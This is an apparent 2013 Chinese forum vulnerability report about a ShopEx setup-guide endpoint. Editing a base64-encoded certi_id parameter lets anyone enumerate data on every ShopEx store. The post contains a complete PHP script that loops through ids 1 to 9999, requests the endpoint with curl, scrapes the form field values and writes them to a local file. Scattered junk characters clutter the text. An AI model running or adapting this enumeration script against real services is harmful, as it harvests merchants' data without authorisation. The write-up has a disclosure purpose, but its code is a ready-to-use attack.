|
|
简要描述:
9 ]% l% m6 t9 f" yShopEx某接口缺陷,可遍历所有网站# k0 ?3 ]9 s" F. S' U7 W
详细说明:
) W; _4 n$ P/ s+ n# Z问题出现在shopex 网店使用向导页面 & R. W' [/ q& i; }
0 {. t& ?) \9 n% ^6 X! J7 i, T- Q8 ~7 Z. f, h
1 K0 _* t) B5 F e) s3 D$ ` ghttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=8 w/ K" y# h' {0 s; Q l8 V
9 q4 K1 B T% p2 p( r7 M# h# x; Z8 V' t3 t: M/ b9 \
2 m) _) O, ]6 m! V
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}9 @4 n6 t/ m' B+ h% m
+ E1 \8 l! a; L) z* {7 L1 Y* E$ ~
, [* ?4 ^/ ?& P& a9 _( J* N/ p2 f; L2 |& f' {! F- i4 E, U h
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
. A* L, _! o& m: B6 w+ M4 f
8 a+ `3 K9 o1 c2 a+ D- B, k9 a. {) r; E0 h. n% r q/ w; I% I
, R* r7 ~# f6 e" n<?php: t# y# ]1 D. w6 m* u
6 p5 r. ?0 {& o4 M% a
for ($i=1; $i < 10000; $i++) { //遍历
% W$ ~' h3 x8 x) \: |
$ @0 W$ C: S" M' d8 ~: |, U ShowshopExD($i);
, ~& e! W# ~% A x$ P! v L+ U6 @4 P
}
* E4 Q5 S4 f* L! J: V: V3 `8 e* b3 l. m) Y$ ^9 K# V( m
function ShowshopExD($cid) {7 Z9 E0 ~8 {9 ^2 r8 _/ q) l
* L" k- i3 Q- N
$url='http://guide.ecos.shopex.cn/step2.php';& b3 b; H: ~% q/ e/ S
- b4 m; _% `. ^# z# {+ s
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');5 [8 `! Z% u4 x( W4 d
1 ] q7 Q w3 I2 B8 r* M
$url = $url.'?refer='.$refer;8 f) S# |) Q# C9 H/ ~
# y" g; W" ]6 k: `9 \2 W8 L
$ch = curl_init($url);) H3 ^; y% q& ~
) d" G! C# K9 m, W0 d. G
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
O" t, r) s+ z' ~# R3 B! ?1 ]
4 u: ]* v1 w% [- F curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;4 _; W3 Z" y' @/ I. t
7 `7 u- x0 b& U1 A& B $result = curl_exec($ch);! I, F u) H: W8 f& h" v) p
1 } {* s! L! V: W6 s" C4 H
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
5 B* r; U& O y; U0 E3 l! s' A0 ^' @5 H! q2 u7 e( L: ~. Q. V3 Y
if(strpos($result,$refer))
0 L" H6 q9 |) B/ ?5 V1 p9 X4 g6 H# Q
* }8 U! }& E% i& h# m& L, v {4 x% G* t& @5 M4 `0 Y
* W$ ^! h. E0 v" R: j, P' q $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
4 U9 A( [ r! i- H7 D) E% w. t+ N& x( j& w$ V1 `
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
; C$ ?* \( o3 ~3 f2 d$ [& A* q) G" ]' Q1 E/ T' h" u/ o
foreach ($value[1] as $key) {
& S+ B. U4 p: a4 ^* v% Z1 R6 g6 @$ d( l' u: d9 x9 d8 x% O3 y
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
. B. p$ g+ s" p" C3 K( l4 O& I
2 U+ e( d0 h/ F+ A# `; o echo $res[1][0].':'.$res[3][0]."\r\n";$ ?& v Z% ^6 T9 r$ z% G# `
" e4 s) s# ^$ [1 K' u $col =$res[1][0].':'.$res[3][0]."\r\n";
' @& U& T8 _: B4 l$ x$ H& L8 q; ^5 X+ S, i Q6 k# O3 o( X
fwrite($fp, $col, strlen($col)); 9 B9 B: C0 E+ d! H& p& A D9 s
# ?" Y5 ?0 f8 ^! k0 m7 q }
/ {2 `; M& M7 ?4 H' S6 s; _+ h" Q( A" v8 ?" U4 N! n. g
echo '--------------------------------'."\r\n";/ x6 m5 K' I+ z) w
" i8 @& m, @4 V) l$ J. H5 e
fclose($fp);
/ o7 L! B2 U. l& d3 e1 S' G* ^6 }
4 M' T( J7 y4 ]# ^ }/ Y% R3 K5 V+ W' U1 L0 L" B
3 O5 @+ `: K, m" J
flush();
% _0 s# \, ^2 y4 i! |6 o1 C* \4 F) G- C7 N2 Q
curl_close($ch);
* M0 r t8 d* o [ x; O. m9 k+ w* c+ b
}3 |- b- ]* v& B- U/ H$ J
) F5 Z# s! Y6 E L?>9 d' w; x; j* R+ h1 Y
漏洞证明:
" ?8 K; j2 \7 A) s6 w% \http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
. V! [' @- K& C, |refer换成其他加密方式. ~; }+ ], _2 Q( Z
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对